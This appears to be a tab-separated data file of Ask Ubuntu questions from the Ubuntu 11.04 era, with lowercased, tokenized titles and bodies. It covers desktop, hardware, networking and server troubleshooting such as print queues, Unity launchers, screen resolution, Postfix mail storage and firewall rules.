37247	is there an easy way to view the print queue ?	with the ( apparent ) loss of the print indicator in natty , i 'm having a little trouble keeping track of my print queue easily . at the moment to bring up a print queue , i bring up the `` printing '' application using the dash , then go to the printer - > view print queue menu . this seems a little convoluted to me , and i 'd like an easier way . is there some way to go directly to the printer queue in natty , like you used to be able to do by clicking on the printer indicator in earlier ubuntu versions ? alternatively , can we turn the printer indicator icon back on when there are ( or have recently been ) queued print jobs ?
37249	xul-based simple text editor ? ( to benefit from rikaichan when writing text files )	i love firefox 's rikaichan extension , it shows the meaning of japanese kanjis when hovering the mouse over them . i am writing a lot of text in japanese , so to benefit from rikaichan i edit in a html-textarea page i created locally . i open this page in a firefox tab when i want to write a text . the problem is that the risks of loosing the text is high . a better alternative would be a xul-based ( firefox extension ? ) notepad-like simple text editor . thunderbird is too heavy . gmail 's compose window is not convenient and inserts undesirable carriage returns . ( related )
37257	gnome 3 shows a striped striped bar on top of the screen	i recently installed the gnome-shell for natty , i am getting a couple of strange graphical issues . 1 ) whenever i press the super key , or try to show the bottom menu i get a strange flickering , the whole screen gets munched up while it animates to show/hide . 2 ) the top bar has an awful effect : it has rainbow coloured stripes . 3 ) some of the tooltips and dropdowns ( not all of them , and its not application specific ) are horribly skewed , they will have a massive angle on the text and the extreme right of the tooltip is cut off and appears on the extreme left of the tooltip . how can i fix these ? if it helps i have a dell inspiron 1545 .
37265	can i use a crikit broadband 3g moden through virtualbox ?	okay bear with me if this if this is a dumb question but i have just got virtual box on my ubuntu system . i may be loosing connection at home soon and am thinking of getting a crikit broadband 3g modem just to have the net , even if it is slow . what i need to know is can i use xp on vb to set it up and then have it work through linux since it does n't support linux , use it only on vbox through ubuntu or would it even work ?
37267	how can i access flash files from streaming websites ?	in maverick , there was an option to download flash videos from sites like youtube , vimeo , etc . by copying the flashxx** file in /tmp directory to another location before closing the window . but in firefox 4 in natty , this does n't work anymore . why ?
37269	second screen detection	when i plug in my a second monitor on my laptop ( sony vaio with nvidia gt330m and proprietary driver ) i have to log out and back in for the external screen to display something . is this really necessary ? what are my other options ? why is the second screen not activated as soon as i plug it in ? thanks !
37275	unable to locate php5	when i gave the sudo apt-get install php5 command it responds with and error message `` unable to locate php5 ''
37277	does ocra screen reader come on edubuntu by default ?	i am working with visually impaired children in kenya and would like to know if orca screen reader comes with edubuntu and whether it would work with the various educational packages on edubuntu . many thanks martin muckle
37278	boot time is super fast , how come ?	the boot time in ubuntu is really fast . 7-10 seconds . comparing it to my mac ( which is about 30-40 seconds ) . how come ubuntu is so much faster ? i 'm thinking that it uses a different kernel ( linux ) . i 'm not sure if that would come into account for anything ...
37283	is there any daemon which constantly monitors system and execute script ?	is there any daemon in ubuntu which constantly monitors system and execute script for specified cases ( like ram uses increased 90 % ) ? my soul purpose is to get a notification whenever resource consumption increases sharply .
37288	why does n't transmission respect my 1 kb/sec upload limit ?	i 'm using ubuntu 10.10 , and have a question about the network activity of transmission 2.22 . even though i set the global upload limit to 1kbs/s or even 0kb/s , my system monitor/conky shows a steady 20-25 kb/s upload rate . i 'm just curious , what 's with this upload rate and is there any chance to reduce it ?
37290	when piping input from one program to another , what happens to the original program if the program receiving output is killed ?	i am piping the output of a program like this using bash : program1 | program2 if program2 is killed somehow ( in my case by a php fatal error ) , what happens to the instance of program1 ?
37296	can not get dell wireless wlan 1397 minicard to work	i am not sure if this is the right place for this question , but i currently am running ubuntu 10.10 and have windows installed with the dual boot option . my wireless card is the dell wireless wlan 1397 minicard . when running windows , it detects and connects to all the available wireless networks that i have access to . however , when i boot into ubuntu , it connects to the wireless networks only sometimes , other time , on entering the username and passphrase , it tries to connect for about a minute and then fails to do so . i read the following on a forum as a temporary fix : i should turn the system off , remove the battery , reconnect and turn it on again . this always works , but it really inconvenient and sometimes , looses connectivy after about 5 minutes of having connected . i would like to point out that it worked fine when i was running ubuntu 10.04 any help is much appreciated .
37297	schools and ubuntu	why do schools not use ubuntu ? i 'm assuming it is because not many people use it ( hmm ... ) and people are n't really familiar with it . it is free and really fast , so i 'm not sure why ... i have n't heard of a school but there probably is a few .
37302	is it possible to slipstream updates ?	with windows you can take a pre-existing image , and slip stream service packs/updates/patches , so you do n't have to install thousands of updates after you install windows . does ubuntu have that option , if so how would one do that ? is there a more to update image then the official current release ? i have noticed that after you install the final release of an ubuntu release , there are tons of updates , depending on how long that release has been out , it sometimes numbers around 500 updates or so . for some people this is unacceptable especially if you are doing a large roll out , the last thing you want to do is install 500 updates on say ... 30 machines for example . any thoughts or pointers would be appreciated .
37304	hdd light is showing disk usage very high at times . how to investigate ?	how should i go about investigating seemingly high disk usage ? from time to time the whole system crashes too - i think the high hdd reads/writes might be to blame . thanks
37305	100 % cpu consumption with adobe flash videos in chrome ?	100 % cpu usage when streaming flash video with chrome , but firefox use less than 50 % of my cpu usage . what causing this ? also any workaround to fix it ? thank you .
37306	how do i configure apt to use a proxy.pac file ?	so i have a proxy.pac file at work ( it does n't have a username or password ) it 's just a simple .pac file . i 've gotten it to work with chrome so i can surf the web , but apt-get and update do not work . how would i go about making this work ? im on 10.10 btw .
37308	how to compile asus-syntec-webcam-driver stk11xx	i have asus v1s and some time ago i was able to easily compile and install it . but now compiling fails ... i hope u guys know what i can do , if there is anything that can be done ... after svn checkout https : //syntekdriver.svn.sourceforge.net/svnroot/syntekdriver syntekdriver and cd ./syntekdriver/trunk/driver as well as make -f makefile.standalone i got : make -c /lib/modules/2.6.36.2/build subdirs=/home/berot3/syntekdriver/trunk/driver modules make [ 1 ] : betrete verzeichnis '/usr/src/linux-headers-2.6.38-8-generic' cc [ m ] /home/berot3/syntekdriver/trunk/driver/stk11xx-usb.o cc [ m ] /home/berot3/syntekdriver/trunk/driver/stk11xx-v4l.o /home/berot3/syntekdriver/trunk/driver/stk11xx-v4l.c:43:28 : fatal error : linux/videodev.h : file not found ! compilation terminated . make [ 2 ] : *** [ /home/berot3/syntekdriver/trunk/driver/stk11xx-v4l.o ] error 1 make [ 1 ] : *** [ _module_/home/berot3/syntekdriver/trunk/driver ] error 2 make [ 1 ] : verlasse verzeichnis '/usr/src/linux-headers-2.6.38-8-generic' make : *** [ driver ] error 2 same for http : //bookeldor-net.info/merdier/makefile-syntekdriver http : //webcache.googleusercontent.com/search ? q=cache : om0zvnlyivqj : bookeldor-net.info/merdier/makefile-syntekdriver+http : //bookeldor-net.info/merdier/makefile-syntekdriver & hl=de & strip=1
37309	how many ubuntu vms can i reasonably expect to run using kvm on a dell r410 xeon 5645 with 24 gb of ram	i am working on an infrastructure refresh for the company i work for and i need to do capacity planning . my boss felt somewhat burned by vms he purchased from a hosting company not living up to the performance level expected , so any capacity numbers for kvm vms that i can use as a basis for my calculations are appreciated .
37313	how do i deactivate f1 and f10 keybindings in gnome-terminal ?	how can i turn off the f1 ( help ) and f10 ( notifications menu ) key bindings ? first one i need for screen utility and second to exit mc in console . there are no such key bindings in the keyboard shortcuts system settings .
37314	ubuntu in hyper-v i/o issues	i have anecdotal information from a colleague about performance issues running ubuntu server in a hyper-v environment and i wanted to find out if there was any truth to it . has anyone had any experience running ubuntu server in hyper-v and are there any tricks to getting good hard drive performance ?
37315	on what specific time are ubuntu versions made public ?	on what specific time are ubuntu versions normally released ? 10.10 was released at 10:10.10 but that 's the only version i know of that has a time specification .
37317	how do i change the size of the compiz window shadow ?	i want to change the size of the shadow of windows in unity , the default is a bit too big for me . launching ccsm and playing with the options under `` window decoration '' does not seem to make a difference and disabling that plugin leaves me with no window decoration at all .
37319	remove banshee 's sound menu support	i am using 11.04 and banshee is the default , but i rather stick with rhythmbox . i want to remove banshee from the sound menu i went into the extensions tab and unchecked all the sound menu support and even the d-bus extension . i restarted the computer but banshee is still in the sound menu . is there any other way to get it off ?
37320	how do i remove wine program entries from the menu ?	i had installed some programms with wine , but i removed wine from my computer . now when i browse all applications in the unity menu , the symbols of the programms i installed with wine are still there . how can i remove them ?
37334	looking for an application for the start-up phase of romance writing	apologice in advance for the maybe off topic question . is there any ubuntu application that helps for the start-up phase of story writing ? i 'm looking for such a tool that provides me the capability to build up the story diagrams , define characters , project the evolution of a saga the saga . thanks in advance .
37335	drag and drop across ( fullscreen ) applications , switching via alt-tab	example drag media file onto totem 's playlist to enqueue bug in compiz especially for unity ( formerly netbook edition , being intended for small screens ) this is quite a vital feature , as applications most often are run fullscreen , and dragging with the touchpad can be cumbersome . https : //bugs.launchpad.net/ubuntu/+source/compiz/+bug/624810 any hint on where to start fixing the bug ? which file/line in compiz source code ? usability background according to fitts , accot , and zhai , the time required to rapidly move to a target area is a function of the distance to and the size of the target ( cf . fitts 's law and steering law ) . drag'n'drop without alt-tab across fullscreen windows requires start to drag object move to launcher/taskbar steer to target app icon -- small and distant target ! wait for app to become focused steer onto window -- ( huge target ) optionally : steer onto intended area of window , e.g . playlist ( fairly large target ) drop object drag'n'drop with alt-tab on the other hand only requires start to drag object alt-tab to other app optionally : steer onto intended area of window , e.g . playlist ( fairly large target ) drop object thus , no small and distant target required for drag'n'drop whilst alt-tabbing workarounds interesting and probably for many users useful alternative approaches are presented in the answers below . great many thanks to the community ! correct answer ... seems to be available only when the bug is fixed , though . some more recent action , maybe relevant as related bug : https : //bugs.launchpad.net/ayatana-design/+bug/727903
37336	how do i get the presentation minimizer to work in libreoffice impress ?	i want to use the presentation minimizer tool in libreoffice , on natty 64bit . i have the package libreoffice-presentation-minimizer installed ( it is enabled by default ) . in ooo , the minimizer tool appeared in the tools menu , but i can not find the option there .
37344	network-manager applet does not detect internet connection	i have been testing out connman , the alternative connection manager . while testing connman , i had to remove my network manager . i did an apt-get purge network-manager* now , when i reinstalled the network manager and all its dependencies , including network-manager-gnome , i can not see it on the panel however , the internet is connected through ethernet . i can access the internet on the browser and also connect vpnc through the cli . but the gui does not recognize it . any idea how to get the gui recognize the eth0 ? adding screenshot for better understanding .
37351	how to add a bookmark to the home folder icon in unity ?	in question how to add my favorite places as a quicklist in my home 's icon in unity ? there is an explanation of how to add my favourite places as a quicklist in the home icon in unity ( i.e . videos , documents , music etc ) . this is useful but is there a way of adding a nautilus bookmark that i have created to this list . i tried simply replicating the text for one of the groups by editing ( gksudo gedit /usr/share/applications/nautilus-home.desktop ) , i.e . [ downloads shortcut group ] name=mybookmark exec=nautilus mybookmark onlyshowin=unity but this had no effect . with thanks .
37355	does it make a sense to install final release instead of beta 2 ?	i 'm not sure if it is better to install final release after it officially ready ( or week later when most problems fixed ) or it is ok to have patched beta ? i think that new is better than patched old , am i right ?
37357	installing kubuntu using a pendrive !	i am a newbie in kubuntu/linux but i know the basics , so i have an old kubuntu 9.10 version cd , which runs fine when i go live ( ie . live cd ) . however i installed kubuntu onto my pendrive to make it a bootable one , it was successful as the installation finished successfully . however when i tried to boot using my pen drive , kubuntu is recognised but i get a console ( similar to dos ) rather than any gui that we usually get . i guess thats the grub console , it supports certain commands like ls ( which gives 7 hd0,1 2 3 etc . like o/p ) halt ( shut down ) and exit ( gets hanged ! ) so please tell me what to do , i tried out all commands in the help section ! but i didnt get directed to the customary gui of kubuntu , is my pd not installed properly or any other reason , i tried it a hundred times and over !
37359	how do i check how much power my laptop is drawing ?	how can i check how much power my laptop is pulling at any given time ?
37360	i ca n't connect wireless network when wakeup after sleep & hibernate	when i put my pc to sleep or hibernate , after that when i open ( wakeup ) ubuntu . my wireless connection can not connect to internet . so in this case i need to restart again ... what is the solution ?
37362	how do i get my save to feature to work for documents ?	my save to was working , but now it wo n't accept names for document so i ca n't save or name my documents .
37364	how do i hide banshee ?	i have just moved from rhythmbox to banshee . when i pressed the `` close '' button on rhythmbox title bar , the rhythmbox window disappears , but the application does not close , and i can still listen to music and control it via the sound menu . is there any similar way to hide ( not close and not minimize ) banshee ? i know i can do that by running banshee -- hide , but i would love to get that result from within banshee , for example by `` closing '' it 's window . is that possible ? if yes , then how do i do that ?
37368	how can i make the quark music player work in unity ?	when i start ( strange- ) quark in natty nothing happens , it does n't appear in the upper panel next to the network , so i ca n't use it . how can i fix it ? http : //hsgg.github.com/quark/ the worst solution is to just use a normal desktop but that is kind of failing .
37369	how do i get dvd to play in vlc from unity dash launcher ?	once i put the dvd into dvd drive , it appears in the unity dash/place . clicking the icon opens nautilus . how do i make clicking the icon to open vlc player and start playing it ? .
37374	how do i stream a video in my server to my computer ?	i have an .avi file in my server , my server is running ubuntu 10.04 lts . normally i would download the .avi file to my computer . but the .avi file is huge so i would like to stream it if it is possible . i read that i can do that with vlc . but after trying so hard i still could n't make it stream.. please help me with this..
37376	how do i partition an install to put / on an ssd ?	i have question regarding , on how to install ubuntu on a ssd ... only boot and core files thou ... i have mechanical hdd for storage . now for the question : when partitioning ... theres a lot of choices and frankly i 'm not familiar with them > _ < , since i had my `` matrix-like awake out of windows '' it has promted me for a rootfile system ... when choose /boot . i then choose / sign for sda . then it complied fine my swap is on mechanical hdd with /home sdb . i 'm going for ahci install to hopefully make trim work : - ) but why is the boot still a bit slugish ? on kubuntu 10.04 it took like a snap with the fingeres best regards
37379	can i install unr in 11.04 ?	i would love to use unr instead of unity , i think it 's much better . i first found it in 10.04 netbook but i do n't want to do a fresh install of that it 's way to much work . i have a new problem , i ca n't choose what interface i want like , unity , unr or normal desktop ( on the log in screen ) . it may be sorted in the final release but , now it 's a big problem . everything works now , and it 's stable , big thanks !
37381	recover from upgrade crash ( 10.04 to 10.10 )	things went really wrong during my upgrade since i had to interrupt after not being abble to accept the license for microsoft fonts ( the yes button was hidden behind the upgrade window and no way to access the `` accept '' button , my god ) . i rebooted using the recovery mode and tried to fix the broken packages ... it managed to install the 10.10 kernels and i booted again using the 10.10 kernels and the recovery mode again . i managed to get the login prompt , but it looks like my user accout desappeared ... any hints about how to proceed next ? thanks !
37382	how to display world daylight map ?	i really liked the world map with daylight time displayed on it , when you click on date/time tray icon . it appeared right bellow the calendar . how do i get it back in unity ?
37385	where can i download gnome shell themes ?	i was wondering if there was anywhere that i could download gnome3 's gnome-shell themes ? i have got gnome3 running perfectly on natty , just want a different theme !
37390	installing ubuntu using updated live usb	i used ubuntu 's startup disk creator to make the live usb , for recovery purposes , and update it often . i have also installed additional software from ubuntu 's software center . if i use that same live usb to install ubuntu on a machine , will it also install all updated and new software or will it just install what came in the original image ?
37392	installing snippits fails	i am trying to install snippits , but it fails with the error message error : error installing snippits : hoe requires rubygems version > = 1.4 how do i get around this ?
37395	graphics card not supported , unusable interface	i just upgraded to ubuntu 11.04 . unfortunately i did n't know that my graphics card did n't support the unity desktop . when i logged in , the interface was totally unusable . i could n't log out , because the logout button was disappearing sometimes and i could n't click on it . how could i logout , if i forget to change the desktop settings ? i really want to use the new interface but my hardware isn't-the-best . hmm ... specs : ppc 500mhz processor , 384mb ram ( 10.3 osx )
37396	very safe to install ubuntu on mac ?	i want to install ubuntu on my intel mac and i do n't want any data lost . i also want to completely uninstall ubuntu if necessary . i 'm wondering if this is possible . i have a backup made ( with time machine ) just in-case . `` it wo n't erase anything '' .
37401	how do i add a launcher for .sh applications ?	i have installed ubuntu ( 11.04 ) . i installed phpstorm which is simply an archive for you to extract and shove in your /opt directory . to run it you would use /opt/phpstorm-103.243/bin/phpstorm.sh in unity i had created a launcher on my desktop . now i have installed gnome-3 ( gnome-shell ) , and i have nothing in my desktop . so how do i run phpstorm quickly ? can i get it to show up in `` applications '' ?
37402	how to ignore assigning /dev/cdrom to specific device ?	i have a hdspa usb stick from vodafone for mobile broadband , a huawei model k3520 ( in some places also designated e169 i think ) which works just fine in ubuntu 10.04 `` lucid '' ( amd64 ) . this device is automatically mounted as a cd-rom device by ubuntu -- supposedly by the hal daemon , hald -- namely the `` partition '' containing the device-specific software . the contents of the auto-mounted partition ( upon inserting the stick in a usb port ) : ubuntu @ lucid : ~ $ ls -lh /media/vmc\ lite*/ total 37m -r -- -- -- -- 1 ubuntu ubuntu 70 2008-03-13 19:39 autorun.inf -r -- -- -- -- 1 ubuntu ubuntu 36m 2008-04-14 19:28 helper.exe -r -- -- -- -- 1 ubuntu ubuntu 316k 2008-03-13 17:33 setup.exe ubuntu @ lucid : ~ $ the symlink /dev/cdrom gets assigned from the cd-rom device at /dev/sr0 to the device /dev/sr1 upon detection of the usb stick , ubuntu @ lucid : ~ $ ls -lh /dev/cdrom lrwxrwxrwx 1 root root 3 2011-04-27 22:48 /dev/cdrom - > sr1 ubuntu @ lucid : ~ $ ls -lh /dev/sr* brw-rw -- -- + 1 root cdrom 11 , 0 2011-04-27 22:34 /dev/sr0 brw-rw -- -- + 1 root cdrom 11 , 1 2011-04-27 22:48 /dev/sr1 ubuntu @ lucid : ~ $ which although not a serious impediment it is nevertheless an annoyance . for example , in the console this forces specifying eject -d /dev/sr0 to open the cd-rom tray , instead of a simple eject ; supposedly , other programs wanting to use the genuine cd-rom drive will require specifying explicitly the device instead of `` assuming '' the symlink /dev/cdrom to point to the `` correct '' device . i have tried to follow instructions from a arch linux thread about hald , by creating my own configuration as /etc/hal/fdi/policy/cdrom.fdi with the following contents : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < deviceinfo version= '' 0.2 '' > < device > < match key= '' block.storage_device '' string= '' /org/freedesktop/hal/devices/storage_model_cddvdw_sh_s223c '' > < merge key= '' volume.policy.should_mount '' type= '' bool '' > true < /merge > < merge key= '' volume.policy.desired_mount_point '' type= '' string '' > cdrom < /merge > < /match > < /device > < device > < match key= '' storage.vendor '' string= '' huawei '' > < match key= '' storage.model '' string= '' mass storage '' > < match key= '' storage.bus '' string= '' usb '' > < match key= '' storage.drive_type '' string= '' cdrom '' > < merge key= '' volume.policy.should_mount '' type= '' bool '' > false < /merge > < /match > < /match > < /match > < /match > < /device > < /deviceinfo > in an unsuccesful attempt to `` coherce '' hald into always assigning /dev/sr0 to /dev/cdrom instead of auto-mounting the usb stick on insertion . i realize that i could use gconf-editor to toggle the key /apps/nautilus/preferences/media_automount , but that would affect all media -- which is not quite what i 'm looking for , although given the low impact of this `` annoyance '' it might be an acceptable compromise . however , i am looking at some insight into what hald configuration might yield the desired results -- ignoring assigning /dev/sr1 ( the usb stick ) to /dev/cdrom and thereby maintaining the symlink of /dev/cdrom to /dev/sr0 ( the cd-rom drive ) .
37405	install ie9 under wine ?	before anyone asks , im a web developer so i need it , not because i want to use it . so , i am trying to install ie9 in wine ( i can get it to run under virtualbox but it is slow/laggy/cumbersome ) . but when i try to run the installer i get `` internet explorer 9 can only be installed under windows vista or windows 7 '' . so is there any way to change what os wine reports itself as ?
37408	can the unity dash search for content within files ?	hi was wondering if unity search can get or will have support for content search ? i know tracker can index your files and you can then search for them , but is it possible to get this with `` in '' unity ? usecase : i click the super key and search for `` lamda '' and i get the pdf and py files where this string is located ( maybe with a preview of the files ? ) . also if the file with name lamda.odf will be shown
37409	why is my internet so slow with an atheros wireless card ?	since i upgraded from ubuntu 10.10 to 11.04 , my internet connection is as slow as hell . i have tested my other 10.10 machine and it is just as quick as the first one was . what has happened ? why is the maximum download speed now 30kb/s instead of the 2.5mb/s i used to have ?
37411	screen resolution stuck at 1024x768	i just updated from ubuntu 10.10 to 11.04 and have an issue regarding the screen resolution . i have intel integrated gfx chip and my monitor supports resolutions larger than 1024x768 . ( in 10.10 i 've been using 1280x1024 ) but as soon as i upgraded , i 'm stuck with 1024x768 resolution and seems i ca n't change it . running xrandr in terminal yields the following results , screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 lvds1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1280x800 58.1 + 1024x768 60.0* 800x600 60.3 56.2 640x480 59.9 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 59.9 + 1360x768 60.0 1024x768 75.1 72.0 70.1 60.0* 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 1280x1024_60.00 ( 0xce ) 109.0mhz h : width 1280 start 1368 end 1496 total 1712 skew 0 clock 63.7khz v : height 1024 start 1027 end 1034 total 1063 clock 59.9hz what maybe the problem ? is it a bug ? what kind of steps i should take in order to get a higher resolution ? ( changing xorg.conf maybe ? ) any insight is highly appreciated . thanks in advance . update screenshot after running xrandr -- addmode vga1 1360x768 as you can see , side bar is not completely visible and ubuntu logo at the task bar is missing . also when you open an application , the task bar of the application ( where it should go to the top panel ) is missing as well..
37412	how can i ensure transmission traffic uses a vpn ?	i 'd like to ensure that transmission only sends/receives traffic when the server it runs on is connected to a vpn . i found this question which is similar but i do n't want to force all traffic through the vpn and i have n't been able to find a good guide on how to use firestarter from the command line . instead i was thinking of using ufw , but i have little to no experience with firewalls , and i 'm hoping the community can help me out . one idea i had would be to force transmission to use a specific port , say 33442 , and then only allow traffic to and from that port from the ip address of the vpn server . i checked out the ubuntu server guide and i think could do something like this : sudo ufw enable sudo ufw deny port tcp from localhost to any port 33442 sudo ufa allow port tcp from localhost to vpnip port 33442 sudo ufw deny port udp from localhost to any port 33442 sudo ufa allow port udp from localhost to vpnip port 33442 does this logic hold its salt ? how would you do it ? what would i use for vpnip , the public ip of the vpn server , or should i specify the local subnet range that the vpn connects me to ? thanks for your help !
37413	how do i install cheese 3.0 ?	after seeing an article on cheese 3.0 and it 's new effects some months back , it was going to be one of the major highlights of 11.04 to me . sadly , i find 3.0 is not in the repo ; it has been released , just not soon enough before the freeze . so how do i install cheese 3.0 in ubuntu 11.04 ?
37414	what 's a good cheap video card ?	can anyone recommend a good , cheap video card that can handle modern desktop requirements ? cheap is somewhere under $ 50 . i 'm talking about decent 3d effects for unity and friends , as well as playing the occasional video and running flash . i 'd like something that 's autodetected and does n't require any effort other than installing a few debs . my monitor is running 1680x1050 . ( i 've checked hardwaresupportcomponentsvideocards , i have n't been able to find promising results on google , and i ca n't find any of the cards listed here for under $ 50 ) update : i 've installed 11.04 and my video performance has gone from slow to constant flashing without showing windows . ( ! ? ! ? )
37416	how can i install metatracker from source ?	following a question i raised a few weeks back , i would like to install tracker and see how it works with natty . the latest stable release of metatracker is 0.10.10 , but unfortunately , only version 0.8.17 can be found packaged . does anyone know how can i install tracker from source , and if anybody has already tried it , please let me know how well does it work with natty . thanks .
37428	trying to install ubuntu : shrinking the windows partiton	edit2 : this issue seems to have been fixed in 11.04 , when installing it now has an option called 'install ubuntu alongside x ' where x is your other operating system . this was very helpful for newbies like me who do n't want to play with hard drive partitions . i would like to install ubuntu on my laptop as my primary operating system while keeping windows . when i get to the screen that says `` allocate disk space , '' i click specify partitions manually because i do n't want to erase windows . problem is , i do n't know how to specify partitions manually . it 's all one huge green bar called sda1 ( ntfs ) . what do i do next ? if i press install now , it says no root files system is defined . i tried the `` shrink volume '' function in windows , but it complained telling me to run chkdsk , so i right clicked the c drive and nagivated to the chkdsk utility , told it to run on the next startup , which it did n't . i am running windows 7 . edit : i figured it out , see answer below
37429	how to get red5 working ?	i installed red5 from the ubuntu universe repository . after installation , i visited http : //localhost:5080 . the page looked like this : as you can see , there 's a broken image on the page . as well , none of the internal links on the page work ( they give 404 errors ) . what am i missing ?
37431	how do i install mysql workbench ?	i am using ubuntu 9.10 - the karmic koala - released in october 2009 i downloaded mysql-workbench-gpl-5.2.33b-1ubu1004-i386.deb from here but when i run this package it show me following error : error : dependency is not satisfiable : libatk1.0-0 ( > = 1.29.3 ) i am new to ubuntu . i have tried many packages but unable to install mysql workbench . how can i install it on my ubuntu ... thanks
37434	how do i add applications to the unity launcher ?	how do i add apps to the launcher ?
37446	gwibber only launches sometimes	i face this problem where gwibber only launches sporadically . sometimes when i click it to launch , it launches and then other times it does n't . i ca n't seem to figure out what is preventing it from launching and what sort of information i need to collect , also where to collect it from to make a bug report . i have killed the gwibber-service processes in the system monitor `` it loads three processes called gwibber-service , is this normal '' several times and tried to launch gwibber again , but this does n't seem to work . the process just called gwibber starts , then the three gwibber-service processes start , then the gwibbber process ends and the three gwibber-service processes remain but the application is still not launching . generally , i want to know are other people facing the same problem . if someone can give me some guidance on how to triage this problem and get the information need to make a bug report i would be grateful . the upside to this though is at least when it is not launching it is preventing me from wasting endless hours reading my streams on identi.ca and twitter , so it is a bit workrave for microblogging . in which case maybe i should n't fix this problem : - )
37451	find out what packages were installed with a particular package ?	i have a simple question . when you install a package using apt-get install , oftentimes , it will install several dependency packages as well as the main one . i was wondering if there is a way to completely reverse this install . often , removing the main package will leave several packages behind . for example , i recently installed kubuntu-desktop . wanting to completely remove it , i had to follow the instructions on this page : http : //www.psychocats.net/ubuntu/puregnome i would like to know exactly how they obtained that information concerning all the packages to uninstall . thanks for any help !
37455	how to copy command console text ?	i have used the wpa_passphrase command and i get something like this : network= { ssid= '' blahblah '' # psk= '' moreblahblah '' psk=d5e532ecca53ea963e5b3b5521bb3682c53fcf5b6d55f15622027145c795b661 } i need to copy that `` psk= [ long string ] '' to my wpa_supplicant.conf file . how can i select it in order to copy it ? and then what command do i use to copy it ? such that in my favourite text editor i can press a paste command to paste it ? ( ps . i do n't have a mouse )
37466	when do iptables rules become active ?	i have an script that bans selected ips from my server . example : iptables -a input -s 123.123.123.123 -j drop my question is : when this rule will start working ? i 'm asking this , because yesterday i banned an ip , but it was still connected to my server ... is something wrong with my command or something else ?
37468	how do i know if a certain blueprint will be discussed at uds ?	there 's already a long list of blueprints registered for oneiric . how do i know whether or not certain blueprints i 'd like to follow will be discussed at the uds ?
37470	adding a new drive for email server	i have installed email server with `` dovecot , postfix , postfixadmin '' etc . now i mounted new driver . all my mails are in folder /home/vmail/ user is : vmail uid=5000 gid=500 . i like to move those files to new mounted drive . what is the right way to do it ? making symbolic link to /media/emaildrive from /home/vmail or configure postfix and dovecot to use /media/emaildrive/vmail ?
37471	where are all the emails stored in postfix ?	i am a newbie in linux . recently , i have installed postfix mta in xubuntu . i just want to know where are all the emails stored in my postfix server . thanks in advance .
37472	taking advantage of an `` intel turbo memory '' card for swap or fast bootup	i have an x61 thinkpad ( currently running 10.10 ) that i purchased 3 years ago . i splurged a little and got a turbo memory expansion to improve my windows boots . when i installed 10.04 ( and subsquently upgraded to 10.10 ) there was no turbo memory support and there 's an awful lot of noise on searches . 1 ) is there any support for intel turbo memory in 11.04 or trivially compilable into the kernel as swap , suspend , hibernate point , or boot partition ? 2 ) if there is , should i bother trying to use it ?
37475	how do i configure syslog server in 10.10 desktop ?	as the title says , how can i setup syslog server in 10.10 ? where can i find the configuration files ?
37477	fortran and c ide	i am currently working on a fortran 77 program which includes several c routines , and using the kdevelop 3.5.3 ( using kde 3.5.11 ) ide for that matter . i had to stick to kdevelop 3.5.3 since the newer versions of kdevelop do not handle ( or not easily : several attempts without success ) that kind of multi-language application . i am looking for a maintained ide under ubuntu which would match these needs , since i am not sure using the old kdevelop version ( 3.5.3 ) is perennial , could anyone give me some advice ? thank you in advance , manuel
37480	does nautilus support undo/redo for basic file operations	i was wondering if nautilus has undo/redo features for basic file operations . to be specific , i want to be able to undo moving , renaming or deleting a file .
37483	check the correctness of copied files	after i copy say 50+ gb ( 30,000 files including different formats ) of files from an internal hard drive to an external drive is there any way to find out if everything has been copied correctly ? also if i stop in between by canceling the operation and later say merge when continuing the operation will the correctness take a hit ? i could use applications like back-in-time but i am very choosy in copying files and for the next time i intend to use copy operation and say merge instead of replace . is it advisable when copying large number of files ?
37485	thin clients video in ltsp changed when adding a new video card to the server	first of all i 'm new in using linux and please forgive my bad english . i have an server with edubuntu ltsp 10.10 , a projector and 20 thin clients . on the server i had to install a video card ( nvidia chipset driver 260.19.06 ) with two ports : dvi and vga so i can connect the projector on the vga port . after i installed the driver i managed to configure display settings in twinview clones . till now everything is ok but now comes the strange part..until i had to install the video card when users login on thin clients their display was normal but now it is mirrored and upside down and i do n't know what happened . can anyone please tell what to do get display to normal ?
37486	where are all those emails stored in postfix , location of storage of emails so that i could backup ?	i am a newbie in linux . recently , i have installed postfix mta in xubuntu . i just want to know where are all the emails stored in my postfix server .
37490	impossible to install	i have a computer ( power mac g4 ) and the cd/dvd drive does n't work . so that means that i can not boot from the ubuntu live cd . i can not boot from a usb drive , either . how would i be able to install ubuntu ? the cd drive was working but said `` seek-error '' on the screen , in red letters .
37491	how do i change my keyboard layout while using xmonad ?	so i have an ibm thinkpad x31 , running natty and xmonad as the window manager . the keyboard is italian . i wish to use an american english keyboard mapping , all the time . how do i do this ?
37496	how to setup a file server over the internet ?	i would like to be able to access the files in my desktop at home from anywhere over the internet . i do n't know much , but i think that would involve setting up a ftp server , right ? can you please point me in the right direction - some reference materials and tutorials ?
37505	11.04 on macbook pro 7,1 ?	on ubuntu macbookpro support page , i 've found info about 10.10 on mbp 7,1 and some info about 11.04 on mbp 8,1+ . but what i would like is information about 11.04 on mbp 7,1 . the issues i 'm most concerned about : does wifi work ? ootb ? does external monitor work ? ootb ? edit : additional info wifi card type : airport extreme ( 0x14e4 , 0x8d ) firmware version : broadcom bcm43xx 1.0 ( 5.10.131.36.1 ) graphics card chipset model : nvidia geforce 320m
37508	what are the new features of ubuntu 11.04 ( natty narwhal ) ?	ubuntu 11.04 has been released . is it worth to upgrade ? my main usage is server side application development , are there interesting features for me in this release ?
37511	is unity going to use the gnome 3 stack ?	will the next release of ubuntu make use of the new gnome stuff or will it sill be based on gnome 2 like in 11.04 ?
